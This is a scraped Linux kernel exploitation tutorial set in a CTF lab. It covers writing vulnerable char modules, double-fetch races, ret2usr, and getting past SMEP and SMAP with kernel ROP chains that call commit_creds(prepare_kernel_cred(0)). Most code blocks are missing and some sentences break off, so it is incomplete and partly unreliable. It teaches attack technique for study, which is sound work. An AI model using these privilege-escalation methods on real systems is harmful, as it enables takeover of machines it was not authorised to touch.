Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Heavily beta
Writing a Char Module is suprisingly simple. First, we specify what happens on init
(loading of the module) and exit
(unloading of the module). We need some special headers for this.
It looks simple, because it is simple. For now, anyway.
First we set the license, because otherwise we get a warning, and I hate warnings. Next we tell the module what to do on load (intro_init()
) and unload (intro_exit()
). Note we put parameters as void
, this is because kernel modules are very picky about requiring parameters (even if just void).
We then register the purposes of the functions using module_init()
and module_exit()
.
Note that we use printk
rather than printf
. GLIBC doesn't exist in kernel mode, and instead we use C's in-built kernel functionality. KERN_ALERT
is specifies the type of message sent, and there are many more types.
Compiling a Kernel Object can seem a little more complex as we use a Makefile
, but it's surprisingly simple:
$(MAKE)
is a special flag that effectively calls make
, but it propagate all same flags that our Makefile
was called with. So, for example, if we call
Then $(MAKE)
will become make -j 8
. Essentially, $(MAKE)
is make
, which compiles the module. The files produced are defined at the top as obj-m
. Note that compilation is unique per kernel, which is why the compiling process uses your unique kernel build section.
Now we've got a ko
file compiled, we can add it to the list of active modules:
If it's successful, there will be no response. But where did it print to?
Remember, the kernel program has no concept of userspace; it does not know you ran it, nor does it bother communicating with userspace. Instead, this code runs in the kernel, and we can check the output using sudo dmesg
.
Here we grab the last line using tail
- as you can see, our printk
is called!
Now let's unload the module:
And there our intro_exit
is called.
You can view currently loaded modules using the lsmod
command
A more useful way to interact with the driver
Linux contains a syscall called ioctl
, which is often used to communicate with a driver. ioctl()
takes three parameters:
File Descriptor fd
an unsigned int
an unsigned long
The driver can be adapted to make the latter two virtually anything - perhaps a pointer to a struct or a string. In the driver source, the code looks along the lines of:
But if you want, you can interpret cmd
and arg
as pointers if that is how you wish your driver to work.
To communicate with the driver in this case, you would use the ioctl()
function, which you can import in C:
And you would have to update the file_operations
struct:
The kernel is the program at the heart of the Operating System. It is responsible for controlling every aspect of the computer, from the nature of syscalls to the integration between software and hardware. As such, exploiting the kernel can lead to some incredibly dangerous bugs.
In the context of CTFs, Linux kernel exploitation often involves the exploitation of kernel modules. This is an integral feature of Linux that allows users to extend the kernel with their own code, adding additional features.
You can find an excellent introduction to Kernel Drivers and Modules by LiveOverflow , and I recommend it highly.
Kernel Modules are written in C and compiled to a .ko
(Kernel Object) format. Most kernel modules are compiled for a specific version kernel version (which can be checked with uname -r
, my Xenial Xerus is 4.15.0-128-generic
). We can load and unload these modules using the insmod
and rmmod
commands respectively. Kernel modules are often loaded into /dev/*
or /proc/
. There are 3 main module types: Char, Block and Network.
Char Modules are deceptively simple. Essentially, you can access them as a stream of bytes - just like a file - using syscalls such as open
. In this way, they're virtually almost dynamic files (at a super basic level), as the values read and written can be changed.
Examples of Char modules include /dev/random
.
I'll be using the term module and device interchangeably. As far as I can tell, they are the same, but please let me know if I'm wrong!
We're going to create a really basic authentication module that allows you to read the flag if you input the correct password. Here is the relevant code:
If we attempt to read()
from the device, it checks the authenticated
flag to see if it can return us the flag. If not, it sends back FAIL: Not Authenticated!
.
In order to update authenticated
, we have to write()
to the kernel module. What we attempt to write it compared to p4ssw0rd
. If it's not equal, nothing happens. If it is, authenticated
is updated and the next time we read()
it'll return the flag!
Let's first try and interact with the kernel by reading from it.
Make sure you sudo chmod 666 /dev/authentication
!
We'll start by opening the device and reading from it.
Note that in the module source code, the length of read()
is completely disregarded, so we could make it any number at all! Try switching it to 1
and you'll see.
After compiling, we get that we are not authenticated:
Epic! Let's write the correct password to the device then try again. It's really important to send the null byte here! That's because copy_from_user()
does not automatically add it, so the strcmp
will fail otherwise!
It works!
Amazing! Now for something really important:
The state is preserved between connections! Because the kernel module remains on, you will be authenticated until the module is reloaded (either via rmmod
then insmod
, or a system restart).
So, here's your challenge! Write the same kernel module, but using ioctl
instead. Then write a program to interact with it and perform the same operations. ZIP file including both below, but no cheating! This is really good practise.
Creating an interactive char driver is surprisingly simple, but there are a few traps along the way.
This is by far the hardest part to understand, but honestly a full understanding isn't really necessary. The new intro_init
function looks like this:
A major number is essentially the unique identifier to the kernel module. You can specify it using the first parameter of register_chrdev
, but if you pass 0
it is automatically assigned an unused major number.
We then have to register the class and the device. In complete honesty, I don't quite understand what they do, but this code exposes the module to /dev/intro
.
Note that on an error it calls class_destroy
and unregister_chrdev
:
These additional classes and devices have to be cleaned up in the intro_exit
function, and we mark the major number as available:
In intro_init
, the first line may have been confusing:
The third parameter fops
is where all the magic happens, allowing us to create handlers for operations such as read
and write
. A really simple one would look something like:
The parameters to intro_read
may be a bit confusing, but the 2nd and 3rd ones line up to the 2nd and 3rd parameters for the read()
function itself:
We then use the function copy_to_user
to write QWERTY
to the buffer passed in as a parameter!
Create a really basic exploit.c
:
If the module is successfully loaded, the read()
call should read QWERTY
into buffer
:
Success!
On modern Linux kernel versions, . The former is the replacement for .ioctl
, with the latter allowing 32-bit processes to perform ioctl
calls on 64-bit systems. As a result, the new file_operations
is likely to look more like this:
Simply use sudo insmod
to load it, .
Userspace exploitation often has the end goal of code execution. In the case of kernel exploitation, we already have code execution; our aim is to escalate privileges, so that when we spawn a shell (or do anything else) using execve("/bin/sh", NULL, NULL)
we are dropped as root
.
To understand this, we have a talk a little about how privileges and credentials work in Linux.
The cred
struct contains all the permissions a task holds. The ones that we care about are typically these:
These fields are all unsigned int
fields, and they represent what you would expect - the UID, GID, and a few other less common IDs for other operations (such as the FSUID, which is checked when accessing a file on the file system). As you can expect, overwriting one or more of these fields is likely a pretty desirable goal.
Note the __randomize_layout
here at the end! This is a compiler flag that tells it to mix the layout up on each load, making it harder to target the structure!
The kernel needs to store information about each running task, and to do this it uses the task_struct
structure. Each kernel task has its own instance.
The task_struct
instances are stored in a linked list, with a global kernel variable init_task
pointing to the first one. Each task_struct
then points to the next.
Along with linking data, the task_struct
also (more importantly) stores real_cred
and cred
, which are both pointers to a cred
struct. The difference between the two is explained here:
In effect, cred
is the permission when we are trying to act on something, and real_cred
when something it trying to act on us. The majority of the time, both will point to the same structure, but a common exception is with setuid executables, which will modify cred
but not real_cred
.
So, which set of credentials do we want to target with an arbitrary write? Honestly, I'm not entirely sure - it feels as if we want to update cred
, as that will change our abilities to read and execute files. Despite that, I have seen writeups overwrite real_cred
, so perhaps I am wrong in that - though, again, they usually point to the same struct and therefore would have the same effect.
Once I work it out, I shall update this (TODO!).
As an alternative to overwriting cred
structs in the unpredictable kernel heap, we can call prepare_kernel_cred()
to generate a new valid cred
struct and commit_creds()
to overwrite the real_cred
and cred
of the current task_struct
.
The function can be found here, but there's not much to say - it creates a new cred
struct called new
then destroys the old
. It returns new
.
If NULL is passed as the argument, it will return a new set of credentials that match the init_task
credentials, which default to root credentials. This is very important, as it means that calling prepare_kernel_cred(0)
results in a new set of root creds!
This last part is actually not true on newer kernel versions - check out Debugging the Kernel Module section!
This function is found here, but ultimately it will update task->real_cred
and task->cred
to the new credentials:
Instructions for compiling the kernel with your own settings, as well as compiling kernel modules for a specific kernel version.
This isn't necessary for learning how to write kernel exploits - all the important parts will be provided! This is just to help those hoping to write challenges of their own, or perhaps set up their own VMs for learning purposes.
There may be other requirements, I just already had them. Check here for the full list.
Use --depth 1
to only get the last commit.
Remove the current compilation configurations, as they are quite complex for our needs
Now we can create a minimal configuration, with almost all options disabled. A .config
file is generated with the least features and drivers possible.
We create a kconfig
file with the options we want to enable. An example is the following:
In order to update the minimal .config
with these options, we use the provided merge_config.sh
script:
That takes a while, but eventually builds a kernel in arch/x86/boot/bzImage
. This is the same bzImage
that you get in CTF challenges.
When we compile kernel modules for our own kernel, we use the following Makefile
structure:
To compile it for a different kernel, all we do is change the -C
flag to point to the newly-compiled kernel rather than the system's:
The module is now compiled for the specific kernel version!
We now have a minimal kernel bzImage
and a kernel module that is compiled for it. Now we need to create a minimal VM to run it in.
To do this, we use busybox
, an executable that contains tiny versions of most Linux executables. This allows us to have all of the required programs, in as little space as possible.
We will download and extract busybox
; you can find the latest version here.
We also create an output folder for compiled versions.
Now compile it statically. We're going to use the menuconfig
option, so we can make some choices.
Once the menu loads, hit Enter
on Settings
. Hit the down arrow key until you reach the option Build static binary (no shared libs)
. Hit Space
to select it, and then Escape
twice to leave. Make sure you choose to save the configuration.
Now, make it with the new options
Now we make the file system.
The last thing missing is the classic init
script, which gets run on system load. A provisional one works fine for now:
Make it executable
Finally, we're going to bundle it into a cpio
archive, which is understood by QEMU.
The -not -name *.cpio
is there to prevent the archive from including itself
You can even compress the filesystem to a .cpio.gz
file, which QEMU also recognises
If we want to extract the cpio
archive (say, during a CTF) we can use this command:
Put bzImage
and initramfs.cpio
into the same folder. Write a short run.sh
script that loads QEMU:
Once we make this executable and run it, we get loaded into a VM!
Right now, we have a minimal linux kernel we can boot, but if we try and work out who we are, it doesn't act quite as we expect it to:
This is because /etc/passwd
and /etc/group
don't exist, so we can just create those!
The final step is, of course, the loading of the kernel module. I will be using the module from my Double Fetch section for this step.
First, we copy the .ko
file to the filesystem root. Then we modify the init
script to load it, and also set the UID of the loaded shell to 1000
(so we are not root!).
Here I am assuming that the major number of the double_fetch
module is 253
.
Why am I doing that?
If we load into a shell and run cat /proc/devices
, we can see that double_fetch
is loaded with major number 253
every time. I can't find any way to load this in without guessing the major number, so we're sticking with this for now - please get in touch if you find one!
If we want to compile a kernel version that is not the latest, we'll dump all the tags:
It takes ages to run, naturally. Once we do that, we can check out a specific version of choice:
We then continue from there.
Some tags seem to not have the correct header files for compilation. Others, weirdly, compile kernels that build, but then never load in QEMU. I'm not quite sure why, to be frank.
Supervisor Memory Execute Protection
If ret2usr is analogous to ret2shellcode, then SMEP is the new NX. SMEP is a primitive protection that ensures any code executed in kernel mode is located in kernel space. This means a simple ROP back to our own shellcode no longer works. To bypass SMEP, we have to use gadgets located in the kernel to achieve what we want to (without switching to userland code).
In older kernel versions we could use ROP to disable SMEP entirely, but this has been patched out. This was possible because SMEP is determined by the 20th bit of the CR4 register, meaning that if we can control CR4 we can disable SMEP from messing with our exploit.
We can enable SMEP in the kernel by controlling the respective QEMU flag (qemu64
is not notable):
An old technique
Using the same setuo as ret2usr, we make one single modification in run.sh
:
Now if we load the VM and run our exploit from last time, we get a kernel panic.
It's worth noting what it looks like for the future - especially these 3 lines:
So, instead of just returning back to userspace, we will try to overwrite CR4. Luckily, the kernel contains a very useful function for this: native_write_cr4(val)
. This function quite literally overwrites CR4.
Assuming KASLR is still off, we can get the address of this function via /proc/kallsyms
(if we update init
to log us in as root
):
Ok, it's located at 0xffffffff8102b6d0
. What do we want to change CR4 to? If we look at the kernel panic above, we see this line:
CR4 is currently 0x00000000001006b0
. If we remove the 20th bit (from the smallest, zero-indexed) we get 0x6b0
.
The last thing we need to do is find some gadgets. To do this, we have to convert the bzImage
file into a vmlinux
ELF file so that we can run ropper
or ROPgadget
on it. To do this, we can run extract-vmlinux
, from the official Linux git repository.
All that changes in the exploit is the overflow:
We can then compile it and run.
This fails. Why?
If we look at the resulting kernel panic, we meet an old friend:
SMEP is enabled again. How? If we debug the exploit, we definitely hit both the gadget and the call to native_write_cr4()
. What gives?
Well, if we look at the source, there's another feature:
Essentially, it will check if the val
that we input disables any of the bits defined in cr4_pinned_bits
. This value is set on boot, and effectively stops "sensitive CR bits" from being modified. If they are, they are unset. Effectively, modifying CR4 doesn't work any longer - and hasn't since version 5.3-rc1.
Bypassing SMEP by ropping through the kernel
The previous approach failed, so let's try and escalate privileges using purely ROP.
First, we have to change the ropchain. Start off with finding some useful gadgets and calling prepare_kernel_cred(0)
:
Now comes the trickiest part, which involves moving the result of RAX to RSI before calling commit_creds()
.
This requires stringing together a collection of gadgets (which took me an age to find). See if you can find them!
I ended up combining these four gadgets:
Gadget 1 is used to set RDX to 0
, so we bypass the jne
in Gadget 2 and hit ret
Gadget 2 and Gadget 3 move the returned cred struct from RAX to RDX
Gadget 4 moves it from RAX to RDI, then compares RDI to RDX. We need these to be equal to bypass the jne
and hit the ret
Recall that we need swapgs
and then iretq
. Both can be found easily.
The pop rbp; ret
is not important as iretq
jumps away anyway.
To simulate the pushing of RIP, CS, SS, etc we just create the stack layout as it would expect - RIP|CS|RFLAGS|SP|SS
, the reverse of the order they are pushed in.
If we try this now, we successfully escalate privileges!
TODO
The most simple of vulnerabilities
A double-fetch vulnerability is when data is accessed from userspace multiple times. Because userspace programs will commonly pass parameters in to the kernel as pointers, the data can be modified at any time. If it is modified at the exact right time, an attacker could compromise the execution of the kernel.
Let's start with a convoluted example, where all we want to do is change the id
that the module stores. We are not allowed to set it to 0
, as that is the ID of root
, but all other values are allowed.
The code below will be the contents of the read()
function of a kernel. I've removed the boilerplate code mentioned previously, but here are the relevant parts:
The program will:
Check if the ID we are attempting to switch to is 0
If it is, it doesn't allow us, as we attempted to log in as root
Sleep for 1 second (this is just to illustrate the example better, we will remove it later)
Compare the password to p4ssw0rd
If it is, it will set the id
variable to the id
in the creds
structure
Let's say we want to communicate with the module, and we set up a simple C program to do so:
We compile this statically (as there are no shared libraries on our VM):
As expected, the id
variable gets set to 900
- we can check this in dmesg
:
That all works fine.
The flaw here is that creds->id
is dereferenced twice. What does this mean? The kernel module is passed a reference to a Credentials
struct:
This is a pointer, and that is perhaps the most important thing to remember. When we interact with the module, we give it a specific memory address. This memory address holds the Credentials
struct that we define and pass to the module. The kernel does not have a copy - it relies on the user's copy, and goes to userspace memory to use it.
Because this struct is controlled by the user, they have the power to change it whenever they like.
The kernel module uses the id
field of the struct on two separate occasions. Firstly, to check that the ID we wish to swap to is valid (not 0
):
And once more, to set the id
variable:
Again, this might seem fine - but it's not. What is stopping it from changing inbetween these two uses? The answer is simple: nothing. That is what differentiates userspace exploitation from kernel space.
Inbetween the two dereferences creds->id
, there is a timeframe. Here, we have artificially extended it (by sleeping for one second). We have a race codition - the aim is to switch id
in that timeframe. If we do this successfully, we will pass the initial check (as the ID will start off as 900
), but by the time it is copied to id
, it will have become 0
and we have bypassed the security check.
Here's the plan, visually, if it helps:
In the waiting period, we swap out the id
.
If you are trying to compile your own kernel, you need CONFIG_SMP
enabled, because we need to modify it in a different thread! Additionally, you need QEMU to have the flag -smp 2
(or more) to enable 2 cores, though it may default to having multiple even without the flag. This example may work without SMP, but that's because of the sleep - when we most onto part 2, with no sleep, we require multiple cores.
The C program will hang on write
until the kernel module returns, so we can't use the main thread.
With that in mind, the "exploit" is fairly self-explanatory - we start another thread, wait 0.3 seconds, and change id
!
We have to compile it statically, as the VM has no shared libraries.
Now we have to somehow get it into the file system. In order to do that, we need to first extract the .cpio
archive (you may want to do this in another folder):
Now copy exploit
there and make sure it's marked executable. You can then compress the filesystem again:
Use the newly-created initramfs.cpio
to lauch the VM with run.sh
. Executing exploit
, it is successful!
Note that the VM loaded you in as root
by default. This is for debugging purposes, as it allows you to use utilities such as dmesg
to read the kernel module output and check for errors, as well as a host of other things we will talk about. When testing exploits, it's always helpful to fix the init
script to load you in as root! Just don't forget to test it as another user in the end.
Removing the artificial sleep
In reality, there won't be a 1-second sleep for your race condition to occur. This means we instead have to hope that it occurs in the assembly instructions between the two dereferences!
This will not work every time - in fact, it's quite likely to not work! - so we will instead have two loops; one that keeps writing 0
to the ID, and another that writes another value - e.g. 900
- and then calling write
. The aim is for the thread that switches to 0
to sync up so perfectly that the switch occurs inbetween the ID check and the ID "assignment".
If we check the source, we can see that there is no msleep
any longer:
Our exploit is going to look slightly different! We'll create the Credentials
struct again and set the ID to 900
:
Then we are going to write this struct to the module repeatedly. We will loop it 1,000,000 times (effectively infinite) to make sure it terminates:
If the ID returned is 0
, we won the race! It is really important to keep in mind exactly what the "success" condition is, and how you can check for it.
Now, in the second thread, we will constantly cycle between ID 900
and 0
. We do this in the hope that it will be 900
on the first dereference, and 0
on the second! I make this loop infinite because it is a thread, and the thread will be killed when the program is (provided you remove pthread_join()
! Otherwise your main thread will wait forever for the second to stop!).
Compile the exploit and run it, we get the desired result:
Look how quick that was! Insane - two fails, then a success!
You might be wondering how tight the race window can be for exploitation - well, gnote
from TokyoWesterns CTF 2019 had a race of two assembly instructions:
The dereferences [rbx]
have just one assembly instruction between, yet we are capable of racing. THAT is just how tight!
ROPpety boppety, but now in the kernel
By and large, the principle of userland ROP holds strong in the kernel. We still want to overwrite the return pointer, the only question is where.
The most basic of examples is the ret2usr technique, which is analogous to ret2shellcode - we write our own assembly that calls commit_creds(prepare_kernel_cred(0))
, and overwrite the return pointer to point there.
Note that the kernel version here is 6.1, due to some added protections we will come to later.
The relevant code is here:
As we can see, it's a size 0x100
memcpy
into an 0x20
buffer. Not the hardest thing in the world to spot. The second printk
call here is so that buffer
is used somewhere, otherwise it's just optimised out by make
and the entire function just becomes xor eax, eax; ret
!
Firstly, we want to find the location of prepare_kernel_cred()
and commit_creds()
. We can do this by reading /proc/kallsyms
, a file that contains all of the kernel symbols and their locations (including those of our kernel modules!). This will remain constant, as we have disabled KASLR.
For obvious reasons, you require root permissions to read this file!
Now we know the locations of the two important functions: After that, the assembly is pretty simple. First we call prepare_kernel_cred(0)
:
Then we call commit_creds()
on the result (which is stored in RAX):
We can throw this directly into the C code using inline assembly:
The next step is overflowing. The 7th qword
overwrites RIP:
Finally, we create a get_shell()
function we call at the end, once we've escalated privileges:
If we run what we have so far, we fail and the kernel panics. Why is this?
The reason is that once the kernel executes commit_creds()
, it doesn't return back to user space - instead it'll pop the next junk off the stack, which causes the kernel to crash and panic! You can see this happening while you debug (which we'll cover soon).
What we have to do is force the kernel to swap back to user mode. The way we do this is by saving the initial userland register state from the start of the program execution, then once we have escalate privileges in kernel mode, we restore the registers to swap to user mode. This reverts execution to the exact state it was before we ever entered kernel mode!
We can store them as follows:
The CS, SS, RSP and RFLAGS registers are stored in 64-bit values within the program. To restore them, we append extra assembly instructions in escalate()
for after the privileges are acquired:
Here the GS, CS, SS, RSP and RFLAGS registers are restored to bring us back to user mode (GS via the swapgs
instruction). The RIP register is updated to point to get_shell
and pop a shell.
If we compile it statically and load it into the initramfs.cpio
, notice that our privileges are elevated!
We have successfully exploited a ret2usr!
How exactly does the above assembly code restore registers, and why does it return us to user space? To understand this, we have to know what all of the registers do. The switch to kernel mode is best explained by a literal StackOverflow post, or another one.
GS - limited segmentation. The contents of the GS register are swapped one of the MSRs (model-specific registers); at the entry to a kernel-space routine, swapgs
enables the process to obtain a pointer to kernel data structures.
Has to swap back to user space
SS - Stack Segment
Defines where the stack is stored
Must be reverted back to the userland stack
RSP
Same as above, really
CS - Code Segment
Defines the memory location that instructions are stored in
Must point to our user space code
RFLAGS - various things
GS is changed back via the swapgs
instruction. All others are changed back via iretq
, the QWORD variant of the iret
family of intel instructions. The intent behind iretq
is to be the way to return from exceptions, and it is specifically designed for this purpose, as seen in Vol. 2A 3-541 of the Intel Software Developer’s Manual:
Returns program control from an exception or interrupt handler to a program or procedure that was interrupted by an exception, an external interrupt, or a software-generated interrupt. These instructions are also used to perform a return from a nested task. (A nested task is created when a CALL instruction is used to initiate a task switch or when an interrupt or exception causes a task switch to an interrupt or exception handler.)
[...]
During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.
As we can see, it pops all the registers off the stack, which is why we push the saved values in that specific order. It may be possible to restore them sequentially without this instruction, but that increases the likelihood of things going wrong as one restoration may have an adverse effect on the following - much better to just use iretq
.
The final version
A practical example
Let's try and run our previous code, but with the latest kernel version (as of writing, 6.10-rc5
). The offsets of commit_creds
and prepare_kernel_cred()
are as follows, and we'll update exploit.c
with the new values:
The major number needs to be updated to 253
in init
for this version! I've done it automatically, but it bears remembering if you ever try to create your own module.
Instead of an elevated shell, we get a kernel panic, with the following data dump:
I could have left this part out of my blog, but it's valuable to know a bit more about debugging the kernel and reading error messages. I actually came across this issue while trying to get the previous section working, so it happens to all of us!
One thing that we can notice is that, the error here is listed as a NULL pointer dereference error. We can see that the error is thrown in commit_creds()
:
We can check the source here, but chances are that the parameter passed to commit_creds()
is NULL - this appears to be the case, since RDI is shown to be 0
above!
In our run.sh
script, we now include the -s
flag. This flag opens up a GDB server on port 1234
, so we can connect to it and debug the kernel. Another useful flag is -S
, which will automatically pause the kernel on load to allow us to debug, but that's not necessary here.
What we'll do is pause our exploit
binary just before the write()
call by using getchar()
, which will hang until we hit Enter
or something similar. Once it pauses, we'll hook on with GDB. Knowing the address of commit_creds()
is 0xffffffff81077390
, we can set a breakpoint there.
We then continue with c
and go back to the VM terminal, where we hit Enter
to continue the exploit. Coming back to GDB, it has hit the breakpoint, and we can see that RDI is indeed 0
:
This explains the NULL dereference. RAX is also 0
, in fact, so it's not a problem with the mov
:
This means that prepare_kernel_cred()
is returning NULL
. Why is that? It didn't do that before!
Let's compare the differences in prepare_kernel_cred()
code between kernel version 6.1 and version 6.10:
The last and first parts are effectively identical, so there's no issue there. The issue arises in the way it handles a NULL argument. On 5.10, it treats it as using init_task
:
i.e. if daemon
is NULL, use init_task
. On 6.10, the behaviour is altogether different:
If daemon
is NULL, return NULL - hence our issue!
Unfortunately, there's no way to bypass this easily! We can fake cred
structs, and if we can leak init_task
we can use that memory address as well, but it's no longer as simple as calling prepare_kernel_cred(0)
!
Supervisor Memory Access Protection
SMAP is a more powerful version of SMEP. Instead of preventing code in user space from being accessed, SMAP places heavy restrictions on accessing user space at all, even for accessing data. SMAP blocks the kernel from even dereferencing (i.e. accessing) data that isn't in kernel space unless it is a set of very specific functions.
For example, functions such as strcpy
or memcpy
do not work for copying data to and from user space when SMAP is enabled. Instead, we are provided the functions copy_from_user
and copy_to_user
, which are allowed to briefly bypass SMAP for the duration of their operation. These functions also have additional hardening against attacks such as buffer overflows, with the function __copy_overflow
acting as a guard against them.
This means that whether you interact using write
/read
or ioctl
, the structs that you pass via pointers all get copied to kernel space using these functions before they are messed around with. This also means that double-fetches are even more unlikely to occur as all operations are based on the snapshot of the data that the module took when copy_from_user
was called (unless copy_from_user
is called on the same struct multiple times).
Like SMEP, SMAP is controlled by the CR4 register, in this case the 21st bit. It is also , so overwriting CR4 does nothing, and instead we have to work around it. There is no specific "bypass", it will depend on the challenge and will simply have to be accounted for.
Enabling SMAP is just as easy as SMEP: